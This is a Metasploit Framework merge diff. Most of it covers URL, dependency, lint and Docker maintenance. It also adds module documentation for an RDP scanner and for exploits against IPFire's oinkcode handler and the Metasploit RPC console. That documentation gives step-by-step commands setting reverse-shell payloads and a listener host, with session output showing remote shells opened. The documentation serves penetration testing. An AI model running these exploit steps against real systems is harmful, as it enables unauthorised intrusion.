Merge branch 'master' of https://github.com/rapid7/metasploit-framework into feature/linux_reverse_tcp_x64_retry

.dockerignore

@@ -90,7 +90,7 @@ data/java
 
 # Avoid checking in Meterpreter libs that are built from
 # private source. If you're interested in this functionality,
-# check out Metasploit Pro: http://metasploit.com/download
+# check out Metasploit Pro: https://metasploit.com/download
 data/meterpreter/ext_server_pivot.*.dll
 
 # Avoid checking in metakitty, the source for

.gitignore

@@ -78,7 +78,7 @@ data/java
 
 # Avoid checking in Meterpreter libs that are built from
 # private source. If you're interested in this functionality,
-# check out Metasploit Pro: http://metasploit.com/download
+# check out Metasploit Pro: https://metasploit.com/download
 data/meterpreter/ext_server_pivot.*.dll
 
 # Avoid checking in metakitty, the source for

.rubocop.yml

@@ -14,6 +14,22 @@ Metrics/ClassLength:
   Exclude:
     - 'modules/**/*'
 
+Metrics/AbcSize:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Metrics/CyclomaticComplexity:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Metrics/PerceivedComplexity:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Style/FrozenStringLiteralComment:
+  Enabled: false
+  Description: 'We cannot support this yet without a lot of things breaking'
+
 Style/Documentation:
   Enabled: true
   Description: 'Most Metasploit modules do not have class documentation.'

.travis.yml

@@ -16,8 +16,6 @@ rvm:
   - '2.4.1'
 
 env:
-# TODO: restore these tests when the code passes them!
-#  - CMD='bundle exec rake cucumber cucumber:boot CREATE_BINSTUBS=true'
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
 

Gemfile

@@ -3,6 +3,14 @@ source 'https://rubygems.org'
 #   spec.add_runtime_dependency '<name>', [<version requirements>]
 gemspec name: 'metasploit-framework'
 
+# These pull in pre-release gems in order to fix specific issues.
+# XXX https://github.com/alexdalitz/dnsruby/pull/134
+gem 'dnsruby', git: 'https://github.com/alexdalitz/dnsruby'
+
+# XXX https://github.com/ConnorAtherton/rb-readline/commit/fd882edcd145c26681f9971be5f6675c7f6d1970
+gem 'rb-readline', git: 'https://github.com/ConnorAtherton/rb-readline' if [
+ 'x86_64-linux', 'x86-linux', 'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
+
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
   # code coverage for tests
@@ -37,14 +45,6 @@ group :development, :test do
 end
 
 group :test do
-  # cucumber extension for testing command line applications, like msfconsole
-  gem 'aruba'
-  # cucumber + automatic database cleaning with database_cleaner
-  gem 'cucumber-rails', :require => false
-  gem 'shoulda-matchers'
   # Manipulate Time.now in specs
   gem 'timecop'
-  # Needed to work around a regression between capybara 2.7.1 and xpath 2.1
-  # XXX remove when capybara is updated to work with xpath 2.1
-  gem 'xpath', '2.0'
 end

Gemfile.lock

@@ -1,7 +1,19 @@
+GIT
+  remote: https://github.com/ConnorAtherton/rb-readline
+  revision: fd882edcd145c26681f9971be5f6675c7f6d1970
+  specs:
+    rb-readline (0.5.4)
+
+GIT
+  remote: https://github.com/alexdalitz/dnsruby
+  revision: 09c3890ccfaedb7fd4951f56575d5c53651e0140
+  specs:
+    dnsruby (1.60.1)
+
 PATH
   remote: .
   specs:
-    metasploit-framework (4.15.1)
+    metasploit-framework (4.15.4)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -16,9 +28,9 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.2.37)
+      metasploit-payloads (= 1.2.44)
       metasploit_data_models
-      metasploit_payloads-mettle (= 0.1.10)
+      metasploit_payloads-mettle (= 0.1.14)
       msgpack
       nessus_rest
       net-ssh
@@ -46,7 +58,7 @@ PATH
       rex-mime
       rex-nop
       rex-ole
-      rex-powershell
+      rex-powershell (< 0.1.73)
       rex-random_identifier
       rex-registry
       rex-rop_builder
@@ -102,48 +114,13 @@ GEM
     arel (6.0.4)
     arel-helpers (2.4.0)
       activerecord (>= 3.1.0, < 6)
-    aruba (0.14.2)
-      childprocess (~> 0.5.6)
-      contracts (~> 0.9)
-      cucumber (>= 1.3.19)
-      ffi (~> 1.9.10)
-      rspec-expectations (>= 2.99)
-      thor (~> 0.19)
     backports (3.8.0)
     bcrypt (3.1.11)
     bindata (2.4.0)
     bit-struct (0.16)
     builder (3.2.3)
-    capybara (2.14.4)
-      addressable
-      mime-types (>= 1.16)
-      nokogiri (>= 1.3.3)
-      rack (>= 1.0.0)
-      rack-test (>= 0.5.4)
-      xpath (~> 2.0)
-    childprocess (0.5.9)
-      ffi (~> 1.0, >= 1.0.11)
     coderay (1.1.1)
-    contracts (0.16.0)
-    cucumber (2.4.0)
-      builder (>= 2.1.2)
-      cucumber-core (~> 1.5.0)
-      cucumber-wire (~> 0.0.1)
-      diff-lcs (>= 1.1.3)
-      gherkin (~> 4.0)
-      multi_json (>= 1.7.5, < 2.0)
-      multi_test (>= 0.1.2)
-    cucumber-core (1.5.0)
-      gherkin (~> 4.0)
-    cucumber-rails (1.5.0)
-      capybara (>= 1.1.2, < 3)
-      cucumber (>= 1.3.8, < 4)
-      mime-types (>= 1.17, < 4)
-      nokogiri (~> 1.5)
-      railties (>= 4, < 5.2)
-    cucumber-wire (0.0.1)
     diff-lcs (1.3)
-    dnsruby (1.60.1)
     docile (1.1.5)
     erubis (2.7.0)
     factory_girl (4.8.0)
@@ -151,15 +128,13 @@ GEM
     factory_girl_rails (4.8.0)
       factory_girl (~> 4.8.0)
       railties (>= 3.0.0)
-    faraday (0.12.1)
+    faraday (0.12.2)
       multipart-post (>= 1.2, < 3)
-    ffi (1.9.18)
     filesize (0.1.1)
     fivemat (1.3.5)
-    gherkin (4.1.3)
     google-protobuf (3.3.0)
-    googleauth (0.5.1)
+    googleauth (0.5.2)
-      faraday (~> 0.9)
+      faraday (~> 0.12)
       jwt (~> 1.4)
       logging (~> 2.0)
       memoist (~> 0.12)
@@ -203,7 +178,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.2.37)
+    metasploit-payloads (1.2.44)
     metasploit_data_models (2.0.15)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -214,16 +189,12 @@ GEM
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.1.10)
+    metasploit_payloads-mettle (0.1.14)
     method_source (0.8.2)
-    mime-types (3.1)
-      mime-types-data (~> 3.2015)
-    mime-types-data (3.2016.0521)
     mini_portile2 (2.2.0)
-    minitest (5.10.2)
+    minitest (5.10.3)
     msgpack (1.1.0)
     multi_json (1.12.1)
-    multi_test (0.1.2)
     multipart-post (2.0.0)
     nessus_rest (0.1.6)
     net-ssh (4.1.0)
@@ -274,7 +245,6 @@ GEM
       rake (>= 0.8.7)
       thor (>= 0.18.1, < 2.0)
     rake (12.0.0)
-    rb-readline (0.5.4)
     recog (2.1.11)
       nokogiri
     redcarpet (3.4.0)
@@ -286,7 +256,7 @@ GEM
       rex-core
       rex-struct2
       rex-text
-    rex-core (0.1.11)
+    rex-core (0.1.12)
     rex-encoder (0.1.4)
       metasm
       rex-arch
@@ -358,8 +328,6 @@ GEM
     sawyer (0.8.1)
       addressable (>= 2.3.5, < 2.6)
       faraday (~> 0.8, < 1.0)
-    shoulda-matchers (3.1.2)
-      activesupport (>= 4.0.0)
     signet (0.7.3)
       addressable (~> 2.3)
       faraday (~> 0.9)
@@ -386,16 +354,13 @@ GEM
       activemodel (>= 4.2.7)
       activesupport (>= 4.2.7)
     xmlrpc (0.3.0)
-    xpath (2.0.0)
-      nokogiri (~> 1.3)
     yard (0.9.9)
 
 PLATFORMS
   ruby
 
 DEPENDENCIES
-  aruba
+  dnsruby!
-  cucumber-rails
   factory_girl_rails
   fivemat
   metasploit-aggregator
@@ -403,14 +368,13 @@ DEPENDENCIES
   octokit
   pry
   rake
+  rb-readline!
   redcarpet
   rspec-rails
   rspec-rerun
-  shoulda-matchers
   simplecov
   timecop
-  xpath (= 2.0)
   yard
 
 BUNDLED WITH
-   1.15.1
+   1.15.3

LICENSE_GEMS

@@ -1,71 +1,62 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
-actionpack, 4.2.8, MIT
+Ascii85, 1.0.2, MIT
-actionview, 4.2.8, MIT
+actionpack, 4.2.9, MIT
-activemodel, 4.2.8, MIT
+actionview, 4.2.9, MIT
-activerecord, 4.2.8, MIT
+activemodel, 4.2.9, MIT
-activesupport, 4.2.8, MIT
+activerecord, 4.2.9, MIT
+activesupport, 4.2.9, MIT
 addressable, 2.5.1, "Apache 2.0"
+afm, 0.2.2, MIT
 arel, 6.0.4, MIT
 arel-helpers, 2.4.0, unknown
-aruba, 0.14.2, MIT
 backports, 3.8.0, MIT
 bcrypt, 3.1.11, MIT
 bindata, 2.4.0, ruby
 bit-struct, 0.16, ruby
 builder, 3.2.3, MIT
-bundler, 1.15.0, MIT
+bundler, 1.15.1, MIT
-capybara, 2.14.0, MIT
-childprocess, 0.5.9, MIT
 coderay, 1.1.1, MIT
-contracts, 0.16.0, "Simplified BSD"
-cucumber, 2.4.0, MIT
-cucumber-core, 1.5.0, MIT
-cucumber-rails, 1.5.0, MIT
-cucumber-wire, 0.0.1, MIT
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
+dnsruby, 1.60.1, "Apache 2.0"
 docile, 1.1.5, MIT
 erubis, 2.7.0, MIT
 factory_girl, 4.8.0, MIT
 factory_girl_rails, 4.8.0, MIT
 faraday, 0.12.1, MIT
-ffi, 1.9.18, "New BSD"
 filesize, 0.1.1, MIT
-fivemat, 1.3.3, MIT
+fivemat, 1.3.5, MIT
-gherkin, 4.1.3, MIT
 google-protobuf, 3.3.0, "New BSD"
 googleauth, 0.5.1, "Apache 2.0"
-grpc, 1.3.4, "New BSD"
+grpc, 1.4.1, "New BSD"
-i18n, 0.8.1, MIT
+hashery, 2.1.2, "Simplified BSD"
+i18n, 0.8.6, MIT
 jsobfu, 0.4.2, "New BSD"
 json, 2.1.0, ruby
 jwt, 1.5.6, MIT
 little-plugger, 1.1.4, MIT
 logging, 2.2.2, MIT
 loofah, 2.0.3, MIT
-memoist, 0.15.0, MIT
+memoist, 0.16.0, MIT
 metasm, 1.0.3, LGPL
 metasploit-aggregator, 0.2.1, "New BSD"
-metasploit-concern, 2.0.4, "New BSD"
+metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 2.0.9, "New BSD"
+metasploit-credential, 2.0.10, "New BSD"
-metasploit-framework, 4.14.23, "New BSD"
+metasploit-framework, 4.15.0, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.2.29, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 2.0.14, "New BSD"
+metasploit_data_models, 2.0.15, "New BSD"
-metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
 method_source, 0.8.2, MIT
-mime-types, 3.1, MIT
+mini_portile2, 2.2.0, MIT
-mime-types-data, 3.2016.0521, MIT
-mini_portile2, 2.1.0, MIT
 minitest, 5.10.2, MIT
 msgpack, 1.1.0, "Apache 2.0"
 multi_json, 1.12.1, MIT
-multi_test, 0.1.2, MIT
 multipart-post, 2.0.0, MIT
 nessus_rest, 0.1.6, MIT
 net-ssh, 4.1.0, MIT
 network_interface, 0.0.1, MIT
-nexpose, 6.0.0, BSD
+nexpose, 6.1.0, BSD
-nokogiri, 1.7.2, MIT
+nokogiri, 1.8.0, MIT
 octokit, 4.7.0, MIT
 openssl-ccm, 1.2.1, MIT
 openvas-omp, 0.0.4, MIT
@@ -73,6 +64,7 @@ os, 0.9.6, MIT
 packetfu, 1.1.13, BSD
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.12.4, LGPL-2.1
+pdf-reader, 2.0.0, MIT
 pg, 0.20.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.0, MIT
@@ -83,14 +75,14 @@ rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
 rails-dom-testing, 1.0.8, MIT
 rails-html-sanitizer, 1.0.3, MIT
-railties, 4.2.8, MIT
+railties, 4.2.9, MIT
 rake, 12.0.0, MIT
 rb-readline, 0.5.4, BSD
-recog, 2.1.8, unknown
+recog, 2.1.11, unknown
 redcarpet, 3.4.0, MIT
-rex-arch, 0.1.4, "New BSD"
+rex-arch, 0.1.9, "New BSD"
-rex-bin_tools, 0.1.3, "New BSD"
+rex-bin_tools, 0.1.4, "New BSD"
-rex-core, 0.1.10, "New BSD"
+rex-core, 0.1.11, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
 rex-exploitation, 0.1.14, "New BSD"
 rex-java, 0.1.5, "New BSD"
@@ -101,23 +93,25 @@ rex-powershell, 0.1.72, "New BSD"
 rex-random_identifier, 0.1.2, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.6, "New BSD"
+rex-socket, 0.1.8, "New BSD"
 rex-sslscan, 0.1.4, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
 rex-text, 0.2.15, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
 robots, 0.10.1, MIT
+rspec, 3.6.0, MIT
 rspec-core, 3.6.0, MIT
 rspec-expectations, 3.6.0, MIT
 rspec-mocks, 3.6.0, MIT
 rspec-rails, 3.6.0, MIT
+rspec-rerun, 1.1.0, MIT
 rspec-support, 3.6.0, MIT
-ruby_smb, 0.0.17, "New BSD"
+ruby-rc4, 0.1.5, MIT
+ruby_smb, 0.0.18, "New BSD"
 rubyntlm, 0.6.2, MIT
 rubyzip, 1.2.1, "Simplified BSD"
 sawyer, 0.8.1, MIT
-shoulda-matchers, 3.1.1, MIT
 signet, 0.7.3, "Apache 2.0"
 simplecov, 0.14.1, MIT
 simplecov-html, 0.10.1, MIT
@@ -126,10 +120,11 @@ sqlite3, 1.3.13, "New BSD"
 sshkey, 1.9.0, MIT
 thor, 0.19.4, MIT
 thread_safe, 0.3.6, "Apache 2.0"
-timecop, 0.8.1, MIT
+timecop, 0.9.1, MIT
+ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 1.2.3, MIT
 tzinfo-data, 1.2017.2, MIT
 windows_error, 0.1.2, BSD
+xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-xpath, 2.1.0, MIT
 yard, 0.9.9, MIT

README.md

@@ -14,8 +14,7 @@ New bugs and feature requests should be directed to:
 API documentation for writing modules can be found at:
   https://rapid7.github.io/metasploit-framework/api
 
-Questions and suggestions can be sent to:
+Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
-  https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
 
 Installing
 --

data/logos/3kom-superhack.txt

@@ -15,5 +15,5 @@
 |                                   %bld[ OK ]%clr                                     |
 |______________________________________________________________________________|
 |                                                                              |
-|                                                        http://metasploit.com |
+|                                                       https://metasploit.com |
 |______________________________________________________________________________|%clr

data/logos/metasploit-shield.txt

@@ -18,4 +18,4 @@
 %bluMMMMMMMMMMNm,%clr            %blueMMMMMNMMNMM%clr
 %bluMMMMNNMNMMMMMNx%clr        %bluMMMMMMNMMNMMNM%clr
 %bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
-%clr%bld        http://metasploit.com
+%clr%bld        https://metasploit.com

data/logos/missile-command.txt

@@ -27,4 +27,4 @@
 ################################################################################
 # %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
 ################################################################################
-                                                           http://metasploit.com%clr
+                                                           https://metasploit.com%clr

data/logos/ninja.txt

@@ -27,4 +27,4 @@
                      #   #   ###  #   #   ##
                      ########################
                       ##     ##   ##     ##
-                            http://metasploit.com%clr
+                            https://metasploit.com%clr

data/logos/r7-metasploit.txt

@@ -1,7 +1,7 @@
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 %%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 %%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-%%  %  %%%%%%%%   %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
+%%  %  %%%%%%%%   %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
 %%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 %%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

data/logos/wake-up-neo.txt

@@ -23,4 +23,4 @@
                  ; ,''-,;' ``-
                   ``-..__``--`
 
-                             http://metasploit.com%clr
+                             https://metasploit.com%clr

data/msfcrawler/basic.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

data/msfcrawler/comments.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

data/msfcrawler/forms.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

data/msfcrawler/frames.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

data/msfcrawler/image.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

data/msfcrawler/link.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

data/msfcrawler/objects.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

data/msfcrawler/scripts.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

data/webcam/answerer.html

@@ -188,7 +188,7 @@
 	</div>
 </div>
 <div class="footer">
-	<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
+	<center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
 </div>
 </body>
 </html>

data/webcam/offerer.html

@@ -195,7 +195,7 @@
 </div>
 
 <div class="footer">
-	<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
+	<center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
 </div>
 
 </body>

docker/Dockerfile

@@ -24,7 +24,6 @@ RUN apk update && \
       bison \
       build-base \
       ruby-dev \
-      libffi-dev\
       openssl-dev \
       readline-dev \
       sqlite-dev \
@@ -35,6 +34,7 @@ RUN apk update && \
       yaml-dev \
       zlib-dev \
       ncurses-dev \
+      git \
     && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
     && bundle install --system $BUNDLER_ARGS \
     && apk del .ruby-builddeps \

docker/bin/msfvenom

@@ -17,5 +17,9 @@ if [[ -z "$MSF_PATH" ]]; then
   MSF_PATH=$(dirname $(dirname $path))
 fi
 
+if [[ -n "$MSF_BUILD" ]]; then
+  docker-compose -f $MSF_PATH/docker-compose.yml build
+fi
+
 cd $MSF_PATH
 docker-compose run --rm --service-ports ms ./msfvenom "$@"

docker/bin/msfvenom-dev

@@ -0,0 +1,26 @@
+#! /bin/bash
+
+if [[ -z "$MSF_PATH" ]]; then
+  path=`dirname $0`
+
+  # check for ./docker/msfconsole.rc
+  if [[ ! -f $path/../msfconsole.rc ]] ; then
+
+    # we are not inside the project
+    realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
+
+    # determine script path
+    pushd $(dirname $(realpath $0)) > /dev/null
+    path=$(pwd)
+    popd > /dev/null
+  fi
+  MSF_PATH=$(dirname $(dirname $path))
+fi
+
+cd $MSF_PATH
+
+if [[ -n "$MSF_BUILD" ]]; then
+  docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build
+fi
+
+docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@"

documentation/modules/auxiliary/scanner/rdp/rdp_scanner.md

@@ -0,0 +1,66 @@
+## Vulnerable Application
+
+  Any system exposing the remote desktop protocol, RDP, typically on 3389/TCP.
+
+## Verification Steps
+
+  1. Do: ```use auxiliary/scanner/rdp/rdp_scanner```
+  2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of RDP
+  3. Do: ```run```
+  4. If the host is exposing an identifiable RDP instance, it will print the endpoint.
+
+## Options
+
+  There are three options currently supported that control what security protocols to
+  send in the RDP negotiation request, which can be helpful in identifying RDP
+  endpoints that might be locked down or configured differently:
+
+  **TLS** Set to true to request TLS security support
+  **CredSSP** Set to true to request CredSSP support
+  **EarlyUser** Set to true to request Early User Authorization Result PDU support
+
+## Scenarios
+
+  ```
+msf auxiliary(rdp_scanner) > run
+
+[+] 10.4.18.26:3389       - Identified RDP
+[+] 10.4.18.22:3389       - Identified RDP
+[+] 10.4.18.89:3389       - Identified RDP
+[+] 10.4.18.9:3389        - Identified RDP
+[+] 10.4.18.67:3389       - Identified RDP
+[+] 10.4.18.80:3389       - Identified RDP
+[+] 10.4.18.34:3389       - Identified RDP
+[+] 10.4.18.70:3389       - Identified RDP
+[+] 10.4.18.30:3389       - Identified RDP
+[+] 10.4.18.76:3389       - Identified RDP
+[+] 10.4.18.13:3389       - Identified RDP
+[+] 10.4.18.91:3389       - Identified RDP
+[+] 10.4.18.5:3389        - Identified RDP
+[+] 10.4.18.47:3389       - Identified RDP
+[+] 10.4.18.41:3389       - Identified RDP
+[+] 10.4.18.105:3389      - Identified RDP
+[*] Scanned  44 of 256 hosts (17% complete)
+[*] Scanned  55 of 256 hosts (21% complete)
+[+] 10.4.18.118:3389      - Identified RDP
+[+] 10.4.18.108:3389      - Identified RDP
+[+] 10.4.18.139:3389      - Identified RDP
+[*] Scanned  94 of 256 hosts (36% complete)
+[*] Scanned 110 of 256 hosts (42% complete)
+[+] 10.4.18.157:3389      - Identified RDP
+[+] 10.4.18.166:3389      - Identified RDP
+[+] 10.4.18.164:3389      - Identified RDP
+[+] 10.4.18.170:3389      - Identified RDP
+[+] 10.4.18.185:3389      - Identified RDP
+[+] 10.4.18.209:3389      - Identified RDP
+[+] 10.4.18.188:3389      - Identified RDP
+[*] Scanned 156 of 256 hosts (60% complete)
+[+] 10.4.18.237:3389      - Identified RDP
+[+] 10.4.18.225:3389      - Identified RDP
+[*] Scanned 186 of 256 hosts (72% complete)
+[*] Scanned 194 of 256 hosts (75% complete)
+[*] Scanned 208 of 256 hosts (81% complete)
+[*] Scanned 253 of 256 hosts (98% complete)
+[*] Scanned 256 of 256 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md

@@ -0,0 +1,48 @@
+## Vulnerable Application
+
+  Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)
+
+This module has been verified against:
+
+1. 2.19 core 100
+2. 2.19 core 110 (exploit-db, not metasploit module)
+
+## Verification Steps
+
+  1. Install the firewall
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
+  4. Do: ```set password admin``` or whatever it was set to at install
+  5. Do: ```set rhost 10.10.10.10```
+  6. Do: ```set payload cmd/unix/reverse_perl```
+  7. Do: ```set lhost 192.168.2.229```
+  8. Do: ```exploit```
+  9. You should get a shell.
+
+## Options
+
+  **PASSWORD**
+
+  Password is set at install.  May be blank, 'admin', or 'ipfire'.
+
+## Scenarios
+
+  ```
+    msf > use exploit/linux/http/ipfire_oinkcode_exec 
+    msf exploit(ipfire_oinkcode_exec) > set password admin
+    password => admin
+    msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
+    rhost => 192.168.2.201
+    msf exploit(ipfire_oinkcode_exec) > set verbose true
+    verbose => true
+    msf exploit(ipfire_oinkcode_exec) > check
+    [*] 192.168.2.201:444 The target appears to be vulnerable.
+    msf exploit(ipfire_oinkcode_exec) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
+    id
+    uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
+    whoami
+    nobody
+  ```

documentation/modules/exploit/multi/misc/msf_rpc_console.md

@@ -0,0 +1,142 @@
+## Description
+
+  This module connects to a specified Metasploit RPC server and uses the *console.write* procedure to execute operating system commands. Valid credentials are required to access the RPC interface.
+
+
+## Vulnerable Application
+
+  [Metasploit](https://www.rapid7.com/products/metasploit/) is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products.
+
+  To start the RPC service, run `msfrpcd -U msf -P abc123`; or run `load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y` from within msfconsole.
+
+  This module has been tested successfully on:
+
+  * Metasploit 4.15 on Kali 1.0.6
+  * Metasploit 4.14 on Kali 2017.1
+  * Metasploit 4.14 on Windows 7 SP1
+
+  Source and Installers:
+
+  * [Source Code Repository](https://github.com/rapid7/metasploit-framework)
+  * [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/multi/misc/msf_rpc_console`
+  3. Do: `set RHOST [IP]`
+  4. Do: `set RPORT [PORT]` (default: `55552`)
+  5. Do: `set USERNAME [USERNAME]` (default: `msf`)
+  6. Do: `set PASSWORD [PASSWORD]`
+  7. Do: `set LHOST [IP]`
+  8. Do: `run`
+  9. You should get a session
+
+
+## Options
+
+  **Username**
+
+  The username for Metasploit RPC (default: `msf`).
+
+  **Password**
+
+  The password for the RPC user.
+
+
+## Scenarios
+
+### Ruby Target
+
+  ```
+  msf > use exploit/multi/misc/msf_rpc_console 
+  msf exploit(msf_rpc_console) > set rhost 172.16.191.166
+  rhost => 172.16.191.166
+  msf exploit(msf_rpc_console) > set username msf
+  username => msf
+  msf exploit(msf_rpc_console) > set password abc123
+  password => abc123
+  msf exploit(msf_rpc_console) > set lhost 172.16.191.181
+  lhost => 172.16.191.181
+  msf exploit(msf_rpc_console) > set target 0
+  target => 0
+  msf exploit(msf_rpc_console) > run
+
+  [*] Started reverse TCP handler on 172.16.191.181:4444 
+  [+] 172.16.191.166:55552 - Authenticated successfully
+  [*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
+  [*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
+  [*] 172.16.191.166:55552 - API version 1.0
+  [+] 172.16.191.166:55552 - Created console #0
+  [*] 172.16.191.166:55552 - Sending payload...
+  [*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400
+
+  whoami
+  win-sgbsd5tqutq\user
+  ```
+
+### Windows CMD Target
+
+  ```
+  msf > use exploit/multi/misc/msf_rpc_console 
+  msf exploit(msf_rpc_console) > set rhost 172.16.191.166
+  rhost => 172.16.191.166
+  msf exploit(msf_rpc_console) > set username msf
+  username => msf
+  msf exploit(msf_rpc_console) > set password abc123
+  password => abc123
+  msf exploit(msf_rpc_console) > set lhost 172.16.191.181
+  lhost => 172.16.191.181
+  msf exploit(msf_rpc_console) > set target 0
+  target => 1
+  msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp 
+  payload => cmd/windows/powershell_reverse_tcp
+  msf exploit(msf_rpc_console) > run
+
+  [*] Started reverse SSL handler on 172.16.191.181:4444 
+  [+] 172.16.191.166:55552 - Authenticated successfully
+  [*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
+  [*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
+  [*] 172.16.191.166:55552 - API version 1.0
+  [+] 172.16.191.166:55552 - Created console #1
+  [*] 172.16.191.166:55552 - Sending payload...
+  [*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400
+
